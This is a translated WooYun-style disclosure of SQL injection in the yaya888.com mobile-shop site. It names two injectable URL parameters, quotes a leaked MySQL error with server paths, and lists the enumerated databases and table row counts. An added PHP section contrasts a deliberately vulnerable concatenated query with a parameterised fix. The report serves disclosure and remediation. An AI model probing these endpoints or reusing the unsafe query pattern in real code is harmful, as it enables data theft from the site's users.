
Vulnerability summary

Defect ID: wooyun-2015-0101874

Title: Yaya Mobile (丫丫手机网): SQL injection with root database privileges, consolidated write-up

Affected vendor: yaya888.com

Reported by: 爱上平顶山

Submitted: 2015-03-18 12:04

Fixed: 2015-05-02 12:38

Published: 2015-05-02 12:38

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-03-18: Details sent to the vendor, awaiting vendor handling
2015-03-18: Vendor confirmed; details disclosed to the vendor only
2015-03-28: Details disclosed to core white hats and domain experts
2015-04-07: Details disclosed to regular white hats
2015-04-17: Details disclosed to intern white hats
2015-05-02: Details disclosed to the public

Brief description:

Just joining in.

Detailed description:

Yaya Mobile (丫丫手机网)
Injection point:
http://appweb.yaya888.com/activity.php?aid=38
Generic injection point: order_info.php?orderid= (common to every city subsite)
web server operating system: Windows 2008
web application technology: Microsoft IIS 7.5, ASP.NET, PHP 5.2.8
back-end DBMS: MySQL >= 5.0.0

Fatal error: Uncaught exception 'Exception' with message ' MySQL Query Error<br> <b>SQL</b>: SELECT * FROM sys_phone_zhuanti WHERE id=38’ and status=1 LIMIT 1<br> <b>错误详情</b>: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '’ and status=1 LIMIT 1' at line 1<br> <b>错误代码</b>:1064<br>' in D:\wwwroot\yaya_app_ftp\wwwroot\Init\Trunk\TrunkMysql.class.php:178 Stack trace: #0 D:\wwwroot\yaya_app_ftp\wwwroot\Init\Trunk\TrunkMysql.class.php(24): TrunkMysql->error('MySQL Query Err...') #1 D:\wwwroot\yaya_app_ftp\wwwroot\Init\Trunk\TrunkModel.class.php(64): TrunkMysql->query('SELECT * FROM s...', Array) #2 D:\wwwroot\yaya_app_ftp\wwwroot\Init\Trunk\TrunkModel.class.php(103): TrunkModel->query('SELECT * FROM s...', Array, true) #3 D:\wwwroot\yaya_app_ftp\wwwroot\Init\Trunk\TrunkModel.class.php(94): TrunkModel->select() #4 D:\wwwroot\yaya_app_ftp\wwwroot\activity.php( in D:\wwwroot\yaya_app_ftp\wwwroot\Init\Trunk\TrunkMysql.class.php on line 178


available databases [10]:
[*] baobao
[*] information_schema
[*] kmyaya
[*] kmyaya6
[*] kmyaya_bak
[*] kmyaya_bak2
[*] kmyaya_bak3
[*] mysql
[*] test
[*] yaya_appapi
Database: kmyaya
+------------------------+---------+
| Table | Entries |
+------------------------+---------+
| oa_stock_archive | 4155088 |
| oa_stock_detail | 2225331 |
| oa_document | 678186 |
| oa_user_login | 632461 |
| oa_stock | 582150 |
| oa_money_detail | 353629 |
| oa_customer_log | 279368 |
| oa_customer | 189993 |
| sys_search | 170864 |
| oa_ip | 169867 |
| oa_service | 133194 |
| sys_goods_price | 119658 |
| oa_stock_booking | 114983 |
| oa_stock_move | 110220 |
| oa_iplogin | 88490 |
| oa_user_log | 83881 |
| sys_goods_price_edit | 72330 |
| sys_client_records | 61834 |
| sys_goods_with | 40973 |
| sys_image | 38405 |
| sys_weixin_openid | 37473 |
| sys_comment | 36565 |
| sys_user_login_log | 28094 |
| coupon_verify | 24815 |
| sys_admin_login | 23900 |
| sys_member_care | 23355 |
| webapp_init_log | 23203 |
| sys_member_login | 22764 |
| game_zhuanpan_open | 22118 |
| sys_weixin_qrcode | 19958 |
| sms_sended | 19732 |
| sys_push_log | 16359 |
| sys_member | 14638 |
| game_zhuanpan_open_bak | 12594 |
| sys_order_list | 11279 |
| sys_article | 11258 |
| oa_stock_inventory | 10715 |
| sys_tracert | 10451 |
| sys_goods_product | 10016 |
| lottery_log | 10002 |
| sys_yhm_codes | 9885 |
| game_zhuanpan_user | 9785 |
| sys_order | 9700 |
| oa_wx_status | 9179 |
| sys_verify | 7369 |
| coupon_visits | 6842 |
| oa_active_order | 6592 |
| sys_admin_log | 6003 |
| game_zhuanpan_user_bak | 5271 |
| sys_district | 5026 |
| sys_client_question | 4962 |
| sys_goods | 4662 |
| sys_weixin_user | 4353 |
| sys_cup_taking | 3903 |
| sys_goods_package | 3636 |
| sys_address | 3385 |
| sys_cup_comment | 2433 |
| sys_user_everyday | 2266 |
| sys_weixin_zan | 2229 |
| sys_cart | 2171 |
| oa_computer | 2023 |
| sys_weixin_token | 1985 |
| game_zhuanpan_gift | 1901 |
| oa_offer_code | 1662 |
| game_zhuanpan_gift_bak | 1151 |
| sys_game_user | 1133 |
| sms_sending | 1000 |
| sys_cprice | 986 |
| sys_weixin_user_msg | 844 |
| sys_game_gift | 782 |
| sys_game_order | 778 |
| game_cd_gift | 743 |
| sys_send_address | 690 |
| oa_user | 686 |
| oa_active_log | 663 |
| sys_bai_nian | 533 |
| game_cd_user | 489 |
| oa_personnel_files | 460 |
| oa_article | 456 |
| sys_help_article | 434 |
| sys_soft | 348 |
| sys_soft_ver | 340 |
| sys_nianhui_scores | 290 |
| game_zhuanpan_pici | 281 |
| sys_nianhui_uses | 232 |
| sys_weixin_yaya | 228 |
| sys_nianhui_user | 182 |
| sys_app_fenlei | 173 |
| sys_advertisement | 156 |
| coupon_stuff | 147 |
| sys_tearch_msg | 125 |
| yy_comment | 124 |
| sys_ads | 113 |
| sys_brands | 109 |
| sys_actgoods | 103 |
| sys_yhm_rules | 98 |
| oa_modlist | 91 |
| sys_goods_with_price | 86 |
| sys_product_cat | 84 |
| sys_goods_cat | 80 |
| sys_hot_links | 79 |
| sys_brand | 70 |
| oa_set_parameter | 66 |
| sys_cup_match | 64 |
| sys_nav | 64 |
| oa_set_depart | 62 |
| sys_ad_position | 57 |
| sys_goods_type | 51 |
| sys_client_phone | 46 |
| oa_usergroup | 45 |
| sys_friendlink | 44 |
| sys_admin | 37 |
| oa_set_shop | 33 |
| sys_knowledge | 33 |
| sys_index_goods | 32 |
| sys_order_price_edit | 31 |
| oa_money_account | 29 |
| sys_phone_zhuanti | 29 |
| oa_money_class | 27 |
| sys_client_company | 27 |
| webapp_auth_login | 26 |
| sys_shops | 25 |
| sys_yhm_codes3 | 24 |
| lottery_activity | 23 |
| oa_url | 23 |
| sys_sites_shop | 22 |
| lottery | 21 |
| sys_shop | 21 |
| sms_tpl | 18 |
| sys_byself | 17 |
| oa_reset | 13 |
| sys_friend_link | 13 |
| webapp_point | 13 |
| sys_contract_config | 12 |
| sys_sites | 12 |
| sys_nianhui_shows | 11 |
| oa_offer_task | 10 |
| sys_wxmoney_test | 10 |
| coupon_con | 8 |
| oa_set_member_rank | 8 |
| sys_article_cat | 8 |
| webapp_upload_image | 8 |
| webapp_upload_voice | 7 |
| sys_game_batch | 6 |
| oa_qwgh | 5 |
| sys_ad | 4 |
| sys_codesend | 4 |
| sys_nav_type | 4 |
| sys_contract_a | 3 |
| sys_game_type | 3 |
| sys_group | 3 |
| sys_phone_zhuanti_tpl | 3 |
| sys_specialprice | 3 |
| webapp_share | 3 |
| oa_customer_score_log | 2 |
| sys_shopcart | 2 |
| sys_site | 2 |
| webapp_init | 2 |
| oa_offer_event | 1 |
| sms_user | 1 |
| sys_contract | 1 |
| sys_phone_num | 1 |
| sys_up_views | 1 |
| sys_web_youhui | 1 |
+------------------------+---------+


ok

Proof of vulnerability:

···

Fix:

Filtering.

Copyright notice: when reposting, credit the source 爱上平顶山@乌云
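The error message quoted above shows the root cause: the query `SELECT * FROM sys_phone_zhuanti WHERE id=38' and status=1 LIMIT 1` only comes out that way when the `aid` parameter is concatenated straight into the SQL string, and the uncaught exception then echoes the SQL text, the file paths and the stack trace to the client. The example below is added here for illustration and is not the vendor's code: it reconstructs that pattern and puts a hardened PHP/PDO version beside it. The table and column names come from the error message; the function names, the DSN, the `app_user` account and its password placeholder are assumptions.

```php
<?php
// Added example, not the vendor's code. Table/column names are taken from the
// error message in the advisory; function names, DSN and credentials are assumed.

// --- Vulnerable pattern (reconstructed for illustration) ---
// $aid arrives from $_GET['aid'] untouched, so a quote character in it becomes
// part of the SQL statement, exactly as the quoted error shows.
function getActivityUnsafe(mysqli $db, $aid)
{
    $sql = "SELECT * FROM sys_phone_zhuanti WHERE id=" . $aid . " and status=1 LIMIT 1";
    return $db->query($sql);
}

// --- Hardened version: validate the type, then bind the value ---
function getActivity(PDO $db, $aid)
{
    // aid is a numeric row id: reject anything that is not a positive integer
    // before it reaches the database layer at all.
    if (!ctype_digit((string) $aid) || (int) $aid < 1) {
        return null;
    }
    // A prepared statement with a typed bound parameter: the value can never
    // change the structure of the query.
    $stmt = $db->prepare(
        'SELECT * FROM sys_phone_zhuanti WHERE id = :id AND status = 1 LIMIT 1'
    );
    $stmt->bindValue(':id', (int) $aid, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Wiring for activity.php (assumed DSN/credentials). Two further points from
// the advisory: the site connects as root (the title says so), whereas the
// web application account should hold only SELECT/INSERT/UPDATE on the tables
// it needs; and database errors must be logged, never echoed, so the SQL text,
// D:\wwwroot\... paths and stack trace do not reach the browser.
ini_set('display_errors', '0');
try {
    $db = new PDO(
        'mysql:host=localhost;dbname=kmyaya',
        'app_user',                    // assumed least-privilege account, not root
        'APP_PASSWORD_PLACEHOLDER',    // placeholder, not a real credential
        array(
            PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
            PDO::ATTR_EMULATE_PREPARES => false, // real server-side prepares
        )
    );
    $activity = getActivity($db, isset($_GET['aid']) ? $_GET['aid'] : '');
    if ($activity === null) {
        header('HTTP/1.1 404 Not Found');
        exit;
    }
    // ... render $activity ...
} catch (PDOException $e) {
    // Log the detail server-side; the client only sees a generic error.
    error_log('activity.php DB error: ' . $e->getMessage());
    header('HTTP/1.1 500 Internal Server Error');
    exit;
}
```

The same shape applies to the `order_info.php?orderid=` endpoint named above: an order id is also an integer, so the `ctype_digit` check plus a `PDO::PARAM_INT` binding removes the injection without any blacklist filtering. Turning `display_errors` off (and keeping `log_errors` on) closes the information leak independently of the injection fix.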


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 10

Confirmed at: 2015-03-18 12:36

Vendor reply:

Thank you.

Latest status:

None yet.